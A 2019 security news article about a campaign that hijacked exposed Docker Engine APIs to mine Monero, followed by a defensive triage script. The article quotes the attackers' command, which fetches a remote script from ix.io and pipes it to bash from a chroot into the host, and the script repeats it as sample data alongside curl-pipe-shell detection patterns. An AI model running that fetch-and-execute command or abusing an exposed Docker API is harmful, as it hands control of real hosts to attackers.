Vulnerable Docker Instance Sought Out by Monero Malware

Docker hosts that expose the Docker Engine API to the internet are being hijacked to mine Monero. The problem is not a flaw in Docker itself but an unauthenticated management API left reachable from the network.

Near the end of November it was discovered that Docker hosts exposing their management API were being targeted by a campaign that injected Monero mining software. During the two days the campaign was live, about 14.82 XMR was mined, roughly $800 USD at the time.

Although that amount wasn’t enough to turn heads, what was significant about the campaign was the scale of the scanning. Attackers scanned up to 59,000 IP networks for exposed Docker API endpoints (the daemon’s unencrypted, unauthenticated TCP listener, port 2375 by default). Once an exposed endpoint was located, an Alpine Linux container was deployed to run chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash', a command that downloads a shell script which installs the XMRig cryptocurrency miner. The chroot into /mnt shows that the host’s filesystem had been mounted into the container, so the script ran against the host itself rather than inside the container.

The campaign was discovered by security firm Bad Packets LLC, which also found that the malware contains a self-defence measure: it disables security tooling on the host and kills processes belonging to rival cryptocurrency-mining botnets.

To avoid being hit, Troy Mursch (co-founder and Chief Research Officer of Bad Packets LLC) says Docker administrators should immediately check whether they are exposing the Docker API endpoint to the internet. If so, they should close the exposed port and stop and delete any containers they do not recognise.
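The two checks Mursch recommends can be scripted. The script below is an added example, not code from the article or from Bad Packets: it flags Docker API listeners bound to anything other than loopback, and containers that match the dropper described above (host root mounted into the container, a chroot into that mount, or a curl-pipe-to-shell command). The sample listener and container lines are constructed for illustration, and the docker inspect format string is my own choice of fields; only the indicators (port 2375, chroot /mnt, curl | bash) come from the article.

```shell
#!/bin/sh
# Added example, not from the article or from Bad Packets: quick triage for the
# two things the article says to check. Each function reads command output on
# stdin, so it runs against live output, saved output, or the constructed
# samples below. Invoke with --live to run against the local host.

# Report Docker API listeners (2375 plain, 2376 TLS) bound to anything other
# than loopback. Feed it `ss -ltnH` (state, queues, local addr:port, ...).
exposed_docker_api() {
    awk '{
        addr = $4
        n = split(addr, parts, ":")
        port = parts[n]
        host = substr(addr, 1, length(addr) - length(port) - 1)
        if ((port == 2375 || port == 2376) && host != "127.0.0.1" && host != "[::1]")
            print addr
    }'
}

# Report containers that look like the dropper described in the article: the
# host root bind-mounted into the container, a chroot into that mount, or a
# curl-pipe-to-shell command. Input is one tab-separated line per container:
# name, image, command, mounts ("source:destination" pairs, space separated),
# as produced by the docker inspect format used in live_scan below.
suspicious_containers() {
    awk -F'\t' '{
        reasons = ""
        if ($4 ~ /(^| )\/:/)                 reasons = reasons ",host-root-mount"
        if ($3 ~ /chroot \/mnt/)             reasons = reasons ",chroot-to-host"
        if ($3 ~ /curl[^|]*\|[ \t]*(ba)?sh/) reasons = reasons ",curl-pipe-shell"
        if (reasons != "") print $1 "\t" substr(reasons, 2)
    }'
}

# Constructed sample data (not captured from a real host): a benign web
# container and one matching the article's description of the dropper.
SAMPLE_LISTENERS=$(printf '%s\n' \
    'LISTEN 0 4096 127.0.0.1:631 0.0.0.0:* users:(("cupsd",pid=812,fd=7))' \
    'LISTEN 0 4096 0.0.0.0:2375 0.0.0.0:* users:(("dockerd",pid=1207,fd=9))' \
    'LISTEN 0 4096 [::]:22 [::]:* users:(("sshd",pid=905,fd=4))')
SAMPLE_CONTAINERS=$(printf '/web\tnginx:1.25\tnginx -g daemon off;\t/srv/www:/usr/share/nginx/html\n/dropper\talpine:latest\tchroot /mnt /bin/sh -c curl -sL4 http://ix.io/1XQa | bash\t/:/mnt')

# Run both checks against the local host (requires ss and docker).
live_scan() {
    echo "== Docker API listeners reachable from the network =="
    ss -ltnH | exposed_docker_api
    echo "== containers matching the dropper pattern (docker rm -f <name> to remove) =="
    docker inspect --format '{{.Name}}{{"\t"}}{{.Config.Image}}{{"\t"}}{{join .Config.Cmd " "}}{{"\t"}}{{range .Mounts}}{{.Source}}:{{.Destination}} {{end}}' \
        $(docker ps -aq) | suspicious_containers
}

if [ "${1-}" = "--live" ]; then
    live_scan
else
    echo "sample listeners flagged:"
    printf '%s\n' "$SAMPLE_LISTENERS" | exposed_docker_api
    echo "sample containers flagged:"
    printf '%s\n' "$SAMPLE_CONTAINERS" | suspicious_containers
fi
```

If the first check reports a non-loopback listener, the fix is to stop publishing the plain TCP endpoint at all (leave dockerd on its Unix socket, or front it with Docker’s own TLS client-certificate verification on 2376) rather than just filtering the port, and to treat every container the second check flags as a host compromise, since a container that has chrooted into the host filesystem has already run code outside the container.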

12/02/2019
